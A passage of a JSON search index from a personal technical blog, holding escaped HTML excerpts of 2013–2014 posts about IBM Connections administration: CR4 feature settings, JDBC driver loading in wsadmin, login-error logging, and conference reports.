\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;/login\u003c/span\u003e$\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;\u003c/span\u003e log\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eThis set the environment variable to log, but when you read the\n\u003ca href=\"http://httpd.apache.org/docs/current/mod/mod_setenvif.html\" target=\"_blank\"\u003eApache\ndocumentation \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n you find:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eThe resource requested on the HTTP request line — generally the portion\nof the URL following the scheme and host portion without the query\nstring. See the RewriteCond directive of mod_rewrite for extra\ninformation on how to match your query string\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-04-15-log-login-errors-of-ibm-connections-with-ibm-http-server/","title":"Log Login Errors of IBM Connections with IBM HTTP Server"},{"body":"IBM released CR4 for IBM Connections 4.5 yesterday evening.\nYou can download CR4, TDISOL and some Cognos Updates at following links:\nFix list for IBM Connections 4.5 CR4 Updating the IBM Connections 4.5 databases to the required schema versions for Cumulative Refresh 4 (CR4) Fix Central Download Link New functions included in IBM Connections 4.5 CR4 New Functions After deploying CR4 you can enable some new features:\nHash tags in status update replies Add\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.hashtagCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; to lotusconnections-config.xml\nNow you can use hash tags in replies.\nInclude file links in status update replies Activate with:\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.attachmentCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; Now you get a add file in the reply window and you can attach one file:\nExpose activity stream search in the user interface and filter by hashtag\nActivate with:\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.social.as.hashtagSearchEnabled\u0026#34;\u0026gt;true\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; Search find hashtags in the activity stream now.\nCommunity Folders Add following code to files-config.xml:\n\u0026lt;folder\u0026gt; \u0026lt;community\u0026gt; \u0026lt;communityFolder enabled=\u0026#34;true\u0026#34;/\u0026gt; \u0026lt;/community\u0026gt; \u0026lt;/folder\u0026gt; With this feature you can add folders in the files module of your community or in the community overview.\nIt is possible to share existing folders and create new ones:\n@mentions via the activity stream API Activated by default, no additional configuration needed! I did not test this feature, but i think it is good.\nProperties section of lotusconnections-config.xml after applying CR4 To activate the new features of CR2 (nextGen Theme), CR3 (badging) and CR4 i have following settings in my lotusconnections-config.xml:\n\u0026lt;properties\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.lconn.core.web.request.HttpRequestFilter.IECompatMode\u0026#34;\u0026gt;false\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.lconn.core.web.styles.theme.default\u0026#34;\u0026gt;gen4\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.news.badgingEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.hashtagCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.connections.ublog.attachmentCommentEnabled\u0026#34;\u0026gt;enabled\u0026lt;/genericProperty\u0026gt; \u0026lt;genericProperty name=\u0026#34;com.ibm.social.as.hashtagSearchEnabled\u0026#34;\u0026gt;true\u0026lt;/genericProperty\u0026gt; \u0026lt;/properties\u0026gt; Update Luis Benitez mentions some more new features in his last blog post: Introducing File Sync for Mobile and More in IBM Connections 4.5 CR4 ","excerpt":"\u003cp\u003eIBM released CR4 for IBM Connections 4.5 yesterday evening.\u003c/p\u003e\n\u003cp\u003eYou can download CR4, TDISOL and some Cognos Updates at following links:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21666249\" target=\"_blank\"\u003eFix list for\nIBM Connections 4.5 CR4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21666250\" target=\"_blank\"\u003eUpdating the\nIBM Connections 4.5 databases to the required schema versions for\nCumulative Refresh 4 (CR4) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-933.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Lotus\u0026amp;product=ibm/Lotus/Lotus%20Connections\u0026amp;release=4.5.0.0\u0026amp;platform=All\u0026amp;function=all\u0026amp;source=fc\" target=\"_blank\"\u003eFix\nCentral Download Link \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21667272\" target=\"_blank\"\u003eNew\nfunctions included in IBM Connections 4.5 CR4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1 id=\"new-functions\"\u003eNew Functions \u003ca href=\"#new-functions\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eAfter deploying CR4 you can enable some new features:\u003c/p\u003e\n\u003ch2 id=\"hash-tags-in-status-update-replies\"\u003eHash tags in status update replies \u003ca href=\"#hash-tags-in-status-update-replies\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003eAdd\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;properties\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e \u0026lt;genericProperty \u003cspan style=\"color:#268bd2\"\u003ename\u003c/span\u003e=\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;com.ibm.connections.ublog.hashtagCommentEnabled\u0026#34;\u003c/span\u003e\u0026gt;enabled\u0026lt;/genericProperty\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u0026lt;/properties\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eto lotusconnections-config.xml\u003c/p\u003e\n\u003cp\u003eNow you can use hash tags in replies.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-04-01-ibm-connections-4-5-cr4-released-new-features-are-available/","title":"IBM Connections 4.5 CR4 released – new features are available"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/bccon/","title":"BCCON"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/engage.ug/","title":"Engage.ug"},{"body":"This week i attended Engage in Breda . I had a session with famous Sharon Bellamy , we covered an update of our Connect 2014 session about BP307 – Practical Solutions for Connections Administrators – Tips and Scripts for Your Daily Busines .\nI enjoyed it very much to be with lovely community guys, old and new friends. I want to thank Theo Heselman , he and his crew did and does a really great job to get us all together (350 attendees, 30 IBM Champions, 65 speakers).\nKitty and Warren Elsmore were with us again and made lovely copies of ourself in lego. Thanks to you too.\nAfter closing session We4It has organized a shuttle to Hamburg. The travel was really good organized and we enjoyed soft drinks, beer and even a great meal at a rainy stop in the middle of the way.\nOli Heinz made great pictures at Engage and Bccon. He also saves this unforgetable experience:\nWell prepared we arrived in Hamburg to be at the bcconde a new usergroup event in Germany. About 100 people were there, to see sessions, talk with speakers and sponsors. 7 of 30 IBM Champions which where in Breda made it to come to Hamburg and 6 of us had a short night there.\nSession with Klaus Bild was the first time presentating the Connect slides in german and doing a session with Klaus. I see forward to make some new sessions with him.\nOn thursday i made a review of a IBM Connections environment in Hamburg. Nothing special, but some interesting effects. Main problem in my eyes is the internet proxy used here.\nFlight back wasn’t special, but again i had to wait half an hour for suitcase at the airport. Finally i arrived at home at March 21st, 00:30.\nThere is only one word to describe this week:\nAWESOME!\n","excerpt":"\u003cp\u003eThis week i attended \u003ca href=\"http://www.engage.ug\" target=\"_blank\"\u003eEngage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in\n\u003ca href=\"http://www.chasse.nl\" target=\"_blank\"\u003eBreda \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I had a session with famous\n\u003ca href=\"http://dilf.me.uk/socialshazza/\" target=\"_blank\"\u003eSharon Bellamy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, we covered an update of\nour Connect 2014 session about\n\u003ca href=\"https://share.stoeps.de/2014-01-27-bp307.pdf\" target=\"_blank\"\u003eBP307\n– Practical Solutions for Connections Administrators – Tips and Scripts\nfor Your Daily Busines \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI enjoyed it very much to be with lovely community guys, old and new\nfriends. I want to thank \u003ca href=\"http://www.xceed.be\" target=\"_blank\"\u003eTheo Heselman \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, he and his\ncrew did and does a really great job to get us all together (350\nattendees, 30 IBM Champions, 65 speakers).\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"https://farm8.staticflickr.com/7436/13310050225_e5eb24cc80.jpg\" alt=\"13310050225 e5eb24cc80\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://warrenelsmore.com/\" target=\"_blank\"\u003eKitty and Warren Elsmore \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n were with us again\nand made lovely copies of ourself in lego. Thanks to you too.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-03-21-some-words-after-engage-and-bcconde/","title":"Some Words After Engage And Bcconde"},{"body":"It was little bit quiet here after Connect 2014. I had lots of projects and no time to add new scripts or even do bug fixing.\nI promised at Connect, that i will fix the JDBC drivers, that they will load on Windows too. See cnxMemberCheckExIDByEmail.py as an example.\nLoading JDBC Drivers within jython scripts Jan Riedel sent me a solution for SLES and i tested his proposal today within Windows. He points me in the right direction, i mustn’t load the path or jar within the script, it is better to load on starting wsadmin. You have to add the JDBC Driver path to WAS_EXT_DIRS.\nI see two ways here:\nChange setupCmdLine.sh|bat (Update) I don’t like to change setupCmdLine directly, because i don’t want to load the driver everytime i start wsadmin or WebSphere, but you can add your JDBC path to the line\nset WAS_EXT_DIRS=….;c:(Windows)\nexport WAS_EXT_DIRS=….:/opt/IBM/JDBC (Linux)\nPlease do not change your setupCmdLine in this way. I had errors on using Connections updateInstaller, when i use it! Use WAS_USER_SCRIPT!\nAdd a WAS_USER_SCRIPT I create a batch|shell script with following content.\nwasuserscript.sh Create the script in $WAS_HOME/profiles/Dmgr01/bin and make it executable.\nexport WAS_EXT_DIRS=$WAS_EXT_DIRS:/opt/IBM/JDBC wasuserscript.bat Create batch in %WAS_HOME%01\nset WAS_EXT_DIRS=%WAS_EXT_DIRS;c:\\IBM\\JDBC Now it is enough to set the environment variable WAS_USER_SCRIPT, then the jdbc driver will be loaded on wsadmin start. So when you want to load cnxmenu.py or one of the scripts using JDBC ( cnxMemberCheckExIDByEmail.py, cnxMemberDeactAndActByEmail.py) simply set the WAS_USER_SCRIPT variable in your operating system, terminal or console.\nexport WAS_USER_SCRIPT=/opt/IBM/.../wasuserscript.sh or\nset WAS_USER_SCRIPT=C:\\....\\wasuserscript.bat Thanks to Victor Toal for your script testing and bug reporting!\nNew scripts I added some scripts for special j2ee roles to the github repository :\ncfgJ2EERoleGlobalModerator.py\ncfgJ2EERoleMetricsReader.py\ncfgJ2EERoleMetricsReportRun.py\ncfgJ2EERoleSocialMail.py\nThese scripts set consistent the roles mentioned in the file name. So you can enable or disable Socialmail integration, Metrics or Moderation.\nNext weeks, next events Next events i will attend are: Engage in Breda , BCCON in Hamburg and Social Connections VI in Prag.\nAt Engage i will speak with my friend Sharon Bellamy about Scripting .\nAt BCCON i will be with my swiss friend and scripting colleague Klaus Bild , we will do the Script show in german .\nI plan a session for SocCon VI too, hope i will get a slot there.\n","excerpt":"\u003cp\u003eIt was little bit quiet here after Connect 2014. I had lots of projects\nand no time to add new scripts or even do bug fixing.\u003c/p\u003e\n\u003cp\u003eI promised at Connect, that i will fix the JDBC drivers, that they will\nload on Windows too. See\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting/blob/master/WebSphere/cnxMemberCheckExIDByEmail.py\" target=\"_blank\"\u003ecnxMemberCheckExIDByEmail.py \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nas an example.\u003c/p\u003e\n\u003ch1 id=\"loading-jdbc-drivers-within-jython-scripts\"\u003eLoading JDBC Drivers within jython scripts \u003ca href=\"#loading-jdbc-drivers-within-jython-scripts\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ca href=\"https://twitter.com/73_janr\" target=\"_blank\"\u003eJan Riedel \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n sent me a solution for SLES and\ni tested his proposal today within Windows. He points me in the right\ndirection, i mustn’t load the path or jar within the script, it is\nbetter to load on starting wsadmin. You have to add the JDBC Driver path\nto WAS_EXT_DIRS.\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-02-26-last-weeks-new-scripts-and-next-weeks/","title":"Last weeks, new scripts and next weeks"},{"body":"IBM Connect 2014 is here. I enjoyed the last days very much! Meeting great old and new friends, community members and the IBM Champions family .\nI’m very impressed of the news IBM provides us. New IBM Mail and Connections Mail, Connections next and the integration of lots of software within IBM Connections.\nToday i will make my session “BP 307 – Practical Solutions for Connections Administrators – Tips and Scripts for Your Daily Business” with the incredible Sharon Belamy . When you’re here in Orlando, we would be happy to see you there.\nFind some videos of our demos here: https://www.dropbox.com/sh/2lio4h18rp0r88a/N-Bz9FHXmn ","excerpt":"\u003cp\u003eIBM Connect 2014 is here. I enjoyed the last days very much! Meeting\ngreat old and new friends, community members and the\n\u003ca href=\"https://www.google.com/url?sa=t\u0026amp;rct=j\u0026amp;q=\u0026amp;esrc=s\u0026amp;source=web\u0026amp;cd=1\u0026amp;cad=rja\u0026amp;ved=0CCYQFjAA\u0026amp;url=https://www-304.ibm.com/connections/blogs/socialbusiness/entry/announcing_the_2014_ibm_champions_for_ics1?lang=en_us\u0026amp;ei=WLLnUoesLfPNsQTTrYGwDQ\u0026amp;usg=AFQjCNF7YMDnIDIglZFB_-IUQirkOhCf-w\u0026amp;bvm=bv.59930103,d.cWc\" target=\"_blank\"\u003eIBM\nChampions family \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI’m very impressed of the news IBM provides us. New IBM Mail and\nConnections Mail, Connections next and the integration of lots of\nsoftware within IBM Connections.\u003c/p\u003e\n\u003cp\u003eToday i will make my session “BP 307 – Practical Solutions for\nConnections Administrators – Tips and Scripts for Your Daily Business”\nwith the incredible \u003ca href=\"http://cube-soft.co.uk/people/\" target=\"_blank\"\u003eSharon Belamy \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. When\nyou’re here in Orlando, we would be happy to see you there.\u003c/p\u003e\n\u003cp\u003eFind some videos of our demos here:\n\u003ca href=\"https://www.dropbox.com/sh/2lio4h18rp0r88a/N-Bz9FHXmn\" target=\"_blank\"\u003ehttps://www.dropbox.com/sh/2lio4h18rp0r88a/N-Bz9FHXmn \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2014/2014-01-28-ibm-connect-2014/","title":"IBM Connect 2014"},{"body":"I had a very busy week and had no time to enjoy the feeling to be an IBM Champion 2014, as it was announced . But after finishing an IBM Connections update this night at 0:30, i realised it and i’m very proud that i was nominated and elected from IBM.\nSee you all in Orlando!\nThanks to the community!\n","excerpt":"\u003cp\u003eI had a very busy week and had no time to enjoy the feeling to be an IBM\nChampion 2014, as it\n\u003ca href=\"https://www.socialbizug.org/blogs/074c311f-1478-4a20-8774-bb7cf9d1abf4/entry/announcing_the_2014_ibm_champions_for_ics?lang=en_us\" target=\"_blank\"\u003ewas\nannounced \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. But after finishing an IBM Connections update this night at\n0:30, i realised it and i’m very proud that i was nominated and elected\nfrom IBM.\u003c/p\u003e\n\u003cp\u003eSee you all in Orlando!\u003c/p\u003e\n\u003cp\u003eThanks to the community!\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-12-06-weekend-is-near-so-short-word-on-this-week/","title":"Weekend is near, so short word on this week"},{"body":"I started a new project on OpenNTF for the collection of scripts we created to speed up and simplify WebSphere and Connections Administration.\nLink to this project: Administration Scripts for WebSphere In the moment most of documentation is only as comment in these scripts. Descriptions can be found in Github and Scripting101 .\nHighlights J2EE Security Role Backup and Restore\nSet initial Security Roles for Connections Applications (Author: Klaus Bild )\nDocumentation When you want to start with this collection, copy the jython script to your Deployment Manager bin-folder ($WAS_HOME/profiles/Dmgr01/bin) and call the scripts with wsadmin.sh -f scriptname\nI will create more documentation in the next days. Please use the slideshare documents Scripting101 and icon uk presentation to begin using and coding jython.\nDannotes I will present some of these scripts on 50. Dannotes on Thursday 28th November in Korsør.\n","excerpt":"\u003cp\u003eI started a new project on \u003ca href=\"http://www.openntf.org\" target=\"_blank\"\u003eOpenNTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n for the\ncollection of scripts we created to speed up and simplify WebSphere and\nConnections Administration.\u003c/p\u003e\n\u003cp\u003eLink to this project:\n\u003ca href=\"http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument\u0026amp;name=Administration%20Scripts%20for%20WebSphere\" target=\"_blank\"\u003eAdministration\nScripts for WebSphere \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eIn the moment most of documentation is only as comment in these scripts.\nDescriptions can be found in\n\u003ca href=\"https://github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003eGithub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and\n\u003ca href=\"https://scripting101.org\" target=\"_blank\"\u003eScripting101 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003ch1 id=\"highlights\"\u003eHighlights \u003ca href=\"#highlights\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eJ2EE Security Role Backup and Restore\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSet initial Security Roles for Connections Applications (Author:\n\u003ca href=\"http://kbild.ch\" target=\"_blank\"\u003eKlaus Bild \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1 id=\"documentation\"\u003eDocumentation \u003ca href=\"#documentation\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eWhen you want to start with this collection, copy the jython script to\nyour Deployment Manager bin-folder ($WAS_HOME/profiles/Dmgr01/bin) and\ncall the scripts with wsadmin.sh -f scriptname\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-11-23-openntf-administration-scripts/","title":"New OpenNTF.org project: Administration Scripts for WebSphere"},{"body":"Luis Benitez announced an update for the mobile applications of IBM Connections.\nFunction is looking great. You can now view, approve and reject CCM Files with your mobile device.\nScreenshot from Socialize Me\nRead more: http://www.lbenitez.com/2013/11/ibm-connections-mobile-apps-updated.html ","excerpt":"\u003cp\u003eLuis Benitez announced an update for the mobile applications of IBM\nConnections.\u003c/p\u003e\n\u003cp\u003eFunction is looking great. You can now view, approve and reject CCM\nFiles with your mobile device.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://2.bp.blogspot.com/-iRx3Zl7GXvI/UnkzoGkGWzI/AAAAAAAAAd0/BcKpZJvhWX0/s1600/ipadCCM4.png\" alt=\"ipadCCM4\" /\u003e\n\u003c/p\u003e\n\n\nScreenshot from Socialize Me\u003c/p\u003e\n\u003cp\u003eRead more:\n\u003ca href=\"http://www.lbenitez.com/2013/11/ibm-connections-mobile-apps-updated.html\" target=\"_blank\"\u003ehttp://www.lbenitez.com/2013/11/ibm-connections-mobile-apps-updated.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e\n\u003cp\u003e \u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-11-05-ibm-connections-mobile-apps-update-with-ccm-support/","title":"IBM Connections Mobile Apps Update with CCM Support"},{"body":"This week i attended the Admincamp in Gelsenkirchen. It was a awesome event, where i met lots of friends and other cool people.\nI made two sessions, you can find the session slides here, in this special case in german.\nSecurity and Administration of IBM Connections\nSave the mice – Scripting in WebSphere, Connections and DB2 (Online Version)\nI have extended and translated the session slides from ICONUK.\nYou can download this Slides as ZIP :\nindex.html is ICONUK Version\nindex-ac.html is german AdminCamp Version\nHere some of my impressions: Oping session with Rudi Knegt Very interesting, but sometimes hard to understand was the second evening:\nRudi live on stage and speaking in *rudisch *about geographic things of the Netherlands and flying dutchmen. Ulrich promised he has a video, i will link it here, when i have found it.\nResume: i enjoyed it very much and i’ll come back next year.\n","excerpt":"\u003cp\u003eThis week i attended the Admincamp in Gelsenkirchen. It was a awesome\nevent, where i met lots of friends and other cool people.\u003c/p\u003e\n\u003cp\u003eI made two sessions, you can find the session slides here, in this\nspecial case in german.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eSecurity and Administration of IBM Connections\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSave the mice – Scripting in WebSphere, Connections and DB2 (Online\nVersion)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp\u003eI have extended and translated the session slides from ICONUK.\u003c/p\u003e\n\u003cp\u003eYou can\n\u003ca href=\"/images/2013/09/WebSphereScripting.zip\"\u003edownload this Slides as ZIP\u003c/a\u003e\n:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eindex.html is ICONUK Version\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eindex-ac.html is german AdminCamp Version\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1 id=\"here-some-of-my-impressions\"\u003eHere some of my impressions: \u003ca href=\"#here-some-of-my-impressions\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003ch2 id=\"oping-session-with-rudi-knegt\"\u003eOping session with Rudi Knegt \u003ca href=\"#oping-session-with-rudi-knegt\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2013/09/wpid-Photo-26.09.2013-2106.jpg\" alt=\"wpid Photo 26.09.2013 2106\" /\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2013/2013-09-27-admincamp-2013-updated-slides-in-german/","title":"Admincamp 2013 – updated slides in german"},{"body":"IBM finally released CR2 for IBM Connections 4.5\nYou find more details and download links here .\nOne fix is the hard coded wikis toc strings. Will test it.\nUpdate You have to update FNCS to 2.0.0.1-FNCS-IF001 . Document contains a short description of the update procedure (Do not forget to read the whole document! Backup the files, because you have to restore them later).\nCognos and Metrics Database needs some changes .\n","excerpt":"\u003cp\u003eIBM finally released CR2 for IBM Connections 4.5\u003c/p\u003e\n\u003cp\u003eYou find more details and\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21649769\u0026amp;myns=swglotus\u0026amp;mynp=OCSSYGQH\u0026amp;mync=R\" target=\"_blank\"\u003edownload\nlinks here \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eOne fix is the hard coded wikis toc strings. Will test it.\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eYou have to\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21640797\" target=\"_blank\"\u003eupdate FNCS to\n2.0.0.1-FNCS-IF001 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Document contains a short description of the update\nprocedure (Do not forget to read the whole document! Backup the files,\nbecause you have to restore them later).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eCognos and Metrics Database\n\u003ca href=\"http://www-01.ibm.com/support/docview.wss?uid=swg21648864\" target=\"_blank\"\u003eneeds some\nchanges \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2013/2013-09-16-ibm-connections-4-5-cr2/","title":"IBM Connections 4.5 CR2 released"},{"body":"I added several plugins to my Eclipse, so i can access the scripts on GitHub and edit through an IDE:\nJython and Python Development PyDev: http://pydev.org/updates Markdown (Documentation within Github) Markdown: http://winterwell.com/software/updatesite/ Access GitHub: EGIT: http://download.eclipse.org/egit/updates Shellscript Editor EasyShell: http://pluginbox.sourceforge.net ShellEd: http://sourceforge.net/projects/shelled/files/shelled/update/ SQL Scripts SQL Explorer: http://eclipsesql.sourceforge.net/ ","excerpt":"\u003cp\u003eI added several plugins to my Eclipse, so i can access the\n\u003ca href=\"http://github.com/stoeps13/ibmcnxscripting\" target=\"_blank\"\u003escripts on GitHub \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and edit\nthrough an IDE:\u003c/p\u003e\n\u003ch1 id=\"jython-and-python-development\"\u003eJython and Python Development \u003ca href=\"#jython-and-python-development\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003ePyDev: \u003ca href=\"http://pydev.org/updates\" target=\"_blank\"\u003ehttp://pydev.org/updates \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"markdown-documentation-within-github\"\u003eMarkdown (Documentation within Github) \u003ca href=\"#markdown-documentation-within-github\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMarkdown: \u003ca href=\"http://winterwell.com/software/updatesite/\" target=\"_blank\"\u003ehttp://winterwell.com/software/updatesite/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"access-github\"\u003eAccess GitHub: \u003ca href=\"#access-github\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEGIT: \u003ca href=\"http://download.eclipse.org/egit/updates\" target=\"_blank\"\u003ehttp://download.eclipse.org/egit/updates \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003ch1 id=\"shellscript-editor\"\u003eShellscript Editor \u003ca href=\"#shellscript-editor\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eEasyShell: \u003ca href=\"http://pluginbox.sourceforge.net\" target=\"_blank\"\u003ehttp://pluginbox.sourceforge.net \u003ci class=\"las la-external-link-alt 